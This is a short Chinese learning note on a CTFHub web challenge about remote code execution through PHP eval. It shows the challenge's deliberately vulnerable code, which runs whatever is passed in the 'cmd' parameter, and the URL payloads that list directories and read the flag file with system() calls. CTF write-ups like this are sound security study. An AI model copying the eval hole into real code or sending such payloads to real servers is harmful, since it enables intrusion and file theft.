CTFHub 技能树 Web RCE eval执行(学习记录)

eval执行

源代码

php 复制代码
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
czysoft15 小时前
se被限速
科技·学习·it·技术·魔法·先进·领先
子不语18015 小时前
从0开始学习S7-1200+ET200SP(3)——两台S7-1200通过TCP连接
网络协议·学习·tcp/ip
llllliznc16 小时前
LLM 学习笔记 Day 5:Agent 核心组件——Planner、Memory 与 Reflection
笔记·学习
hyhsandy180316 小时前
STM32F103 TIM学习笔记
笔记·stm32·学习
GuHenryCheng16 小时前
【ESP32】ESP-IDF开发环境搭建(cursor)
git·stm32·单片机·学习
编程圈子17 小时前
电机驱动开发学习18. SVPWM空间矢量调制算法详解与实现
驱动开发·学习·算法
Kobebryant-Manba17 小时前
学习注意力的seq2seq
学习
小毛球.17 小时前
Java 全套基础体系博客终篇|全系列内容完整复盘 + 学习路线收尾总结
java·开发语言·学习
AI科技星18 小时前
基于32维Cayley_Dickson超复数的全域拓扑统一场论——反重力、真空自持供能、维度瞬移与星际宇宙脑秩序体系
人工智能·学习·算法·机器学习·数据挖掘
大鱼>18 小时前
无监督学习:聚类/降维/异常检测
学习·机器学习·聚类